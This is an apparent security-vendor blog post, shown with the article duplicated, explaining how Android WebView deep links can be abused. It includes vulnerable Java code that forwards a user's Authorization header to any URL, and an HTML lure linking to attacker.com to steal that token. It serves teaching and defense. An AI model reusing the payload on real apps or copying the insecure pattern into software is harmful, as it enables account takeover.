Engineering
mins read

How Threat Actors are Exploiting Android Webview

How Threat Actors are Exploiting Android Webview

September 5, 2022
Green Alert
Last Update posted on
February 3, 2024
Ensure your mobile applications are safe and sound.

Ensure the safety and integrity of your mobile applications with CloudSEK BeVigil Enterprise Mobile App Scanner module.

Schedule a Demo
Table of Contents
Author(s)
No items found.

What is a WebView

WebView is a simple but powerful way to present web-based content in Android. It is used as a dedicated web browser instance of an application that can deliver web pages to users. WebView was first released as a part of Android 4.4. Since Android 5.0, it is included as a system application.

Applications of WebView:

  • Hybrid frameworks such as Cordova or PhoneGap (except Flutter) wrap HTML/Javascript applications into the native Android container and use WebView to make it work.
  • Applications, such as banking apps, use WebView to present content like “terms and conditions”, which change constantly.
  • Companies with small budgets can build mobile applications that render web content using WebView.

What is the Problem?

Threat

WebView vulnerabilities that allow threat actors to:

    • Load arbitrary URLs
    • Execute JavaScript code
    • Execute code remotely

Impact

  • The leak of authentication tokens
  • Access to JavaScript interfaces
  • Attacks on internal handlers
  • Theft of arbitrary files via XHR queries
  • Access to cookies
  • The exploitation of content providers

Mitigation

  • Validate the origin (host and scheme) of external links loaded in WebView.  
  • Ensure that JavaScript called using externally obtained data is sanitized.

How to Exploit

We will use the following AndroidManifest.xml file to understand how threat actors can exploit WebView

<activity android:name=”.DeeplinkActivity”>

<intent-filter>

<action android:name=”android.intent.action.VIEW” />

<category android:name=”android.intent.category.DEFAULT” />

<data android:scheme=”myapp” android:host=”deeplink” />

</intent-filter>

</activity>

Let’s assume that this file can process WebView deep links:

public class DeeplinkActivity extends Activity {

protected void onCreate(Bundle savedInstanceState) {

super.onCreate(savedInstanceState);

handleDeeplink(getIntent());

}

private void handleDeeplink(Intent intent) {

Uri deeplink = intent.getData();

if (“/webview”.equals(deeplink.getPath())) {

String url = deeplink.getQueryParameter(“url”);

handleWebViewDeeplink(url);

}

}

private void handleWebViewDeeplink(String url) {

WebView webView = …;

setupWebView(webView);

webView.loadUrl(url, getAuthHeaders());

}

private Map<String, String> getAuthHeaders() {

Map<String, String> headers = new HashMap<>();

headers.put(“Authorization”, getUserToken());

return headers;

}

}

In this case an attacker can carry out a remote attack to obtain the user’s authentication token by creating a page with the following code:

<html>

<body style=”text-align: center;”>

<h1><a href=”myapp://deeplink/webview?url=https://attacker.com/“>Click Me!</a></h1>

</body></html>

When the victim clicks on the “click me” button, the vulnerable app will open https://attacker[.]com, in the WebView, along with the authorization header. The attacker can use the stolen authentication tokens to gain full access to the victim’s account.

References

Author

Predict Cyber threats against your organization

Schedule a Demo
Related Posts
Blog Image
Emerging Threats
May 29, 2024

Your Brand Guardians: A Deep Dive into CloudSEK's Takedown Services

Discover how CloudSEK's comprehensive takedown services protect your brand from online threats.

Blog Image
Engineering
May 19, 2020

How to bypass CAPTCHAs easily using Python and other methods

How to bypass CAPTCHAs easily using Python and other methods

Blog Image
Engineering
June 3, 2020

What is shadow IT and how do you manage shadow IT risks associated with remote work?

What is shadow IT and how do you manage shadow IT risks associated with remote work?

Join 10,000+ subscribers

Keep up with the latest news about strains of Malware, Phishing Lures,
Indicators of Compromise, and Data Leaks.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

CloudSEK XVigil

Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.

Learn more about XVigil
CloudSEK SVigil

Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.

Learn more about SVigil
CloudSEK SVigil

Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.

Learn more about BeVigil Ent
CloudSEK BeVigil

Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.

Learn more about BeVigil
Engineering

min read

How Threat Actors are Exploiting Android Webview

How Threat Actors are Exploiting Android Webview

Authors
Co-Authors
No items found.

What is a WebView

WebView is a simple but powerful way to present web-based content in Android. It is used as a dedicated web browser instance of an application that can deliver web pages to users. WebView was first released as a part of Android 4.4. Since Android 5.0, it is included as a system application.

Applications of WebView:

  • Hybrid frameworks such as Cordova or PhoneGap (except Flutter) wrap HTML/Javascript applications into the native Android container and use WebView to make it work.
  • Applications, such as banking apps, use WebView to present content like “terms and conditions”, which change constantly.
  • Companies with small budgets can build mobile applications that render web content using WebView.

What is the Problem?

Threat

WebView vulnerabilities that allow threat actors to:

    • Load arbitrary URLs
    • Execute JavaScript code
    • Execute code remotely

Impact

  • The leak of authentication tokens
  • Access to JavaScript interfaces
  • Attacks on internal handlers
  • Theft of arbitrary files via XHR queries
  • Access to cookies
  • The exploitation of content providers

Mitigation

  • Validate the origin (host and scheme) of external links loaded in WebView.  
  • Ensure that JavaScript called using externally obtained data is sanitized.

How to Exploit

We will use the following AndroidManifest.xml file to understand how threat actors can exploit WebView

<activity android:name=”.DeeplinkActivity”>

<intent-filter>

<action android:name=”android.intent.action.VIEW” />

<category android:name=”android.intent.category.DEFAULT” />

<data android:scheme=”myapp” android:host=”deeplink” />

</intent-filter>

</activity>

Let’s assume that this file can process WebView deep links:

public class DeeplinkActivity extends Activity {

protected void onCreate(Bundle savedInstanceState) {

super.onCreate(savedInstanceState);

handleDeeplink(getIntent());

}

private void handleDeeplink(Intent intent) {

Uri deeplink = intent.getData();

if (“/webview”.equals(deeplink.getPath())) {

String url = deeplink.getQueryParameter(“url”);

handleWebViewDeeplink(url);

}

}

private void handleWebViewDeeplink(String url) {

WebView webView = …;

setupWebView(webView);

webView.loadUrl(url, getAuthHeaders());

}

private Map<String, String> getAuthHeaders() {

Map<String, String> headers = new HashMap<>();

headers.put(“Authorization”, getUserToken());

return headers;

}

}

In this case an attacker can carry out a remote attack to obtain the user’s authentication token by creating a page with the following code:

<html>

<body style=”text-align: center;”>

<h1><a href=”myapp://deeplink/webview?url=https://attacker.com/“>Click Me!</a></h1>

</body></html>

When the victim clicks on the “click me” button, the vulnerable app will open https://attacker[.]com, in the WebView, along with the authorization header. The attacker can use the stolen authentication tokens to gain full access to the victim’s account.

References